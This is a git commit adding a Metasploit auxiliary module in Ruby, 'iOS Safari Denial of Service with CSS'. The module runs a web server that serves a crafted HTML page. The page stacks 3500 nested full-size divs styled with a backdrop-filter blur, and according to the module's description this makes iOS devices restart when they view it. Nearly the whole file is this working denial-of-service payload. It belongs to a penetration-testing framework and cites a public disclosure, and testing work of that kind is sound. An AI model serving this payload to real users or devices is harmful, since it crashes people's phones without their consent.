add ios blur dos module

GSoC/Meterpreter_Web_Console
Tim W 2018-09-16 13:44:43 +08:00
parent 8c81250aea
commit 2eb97ea07b
1 changed files with 62 additions and 0 deletions

View File

@ -0,0 +1,62 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "iOS Safari Denial of Service with CSS",
'Description' => %q(
This module exploits a vulnerability in WebKit on Apple iOS.
If successful, the device will restart after viewing the webpage.
),
'License' => MSF_LICENSE,
'Author' => [
'pwnsdx'
],
'References' => [
['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],
['URL', 'https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
],
'DisclosureDate' => "Sep 15 2018",
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit
end
def on_request_uri(cli, _request)
print_status('Sending response')
html = %|
<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<style>
div {
backdrop-filter: blur(10px);
-webkit-backdrop-filter: blur(10px);
width:10000px; height:10000px;
}
</style>
</head>
<body>
|
html += "<div>" * 3500
html += "</div>" * 3500
html += %|
</body>
</html>
|
send_response(cli, html)
end
end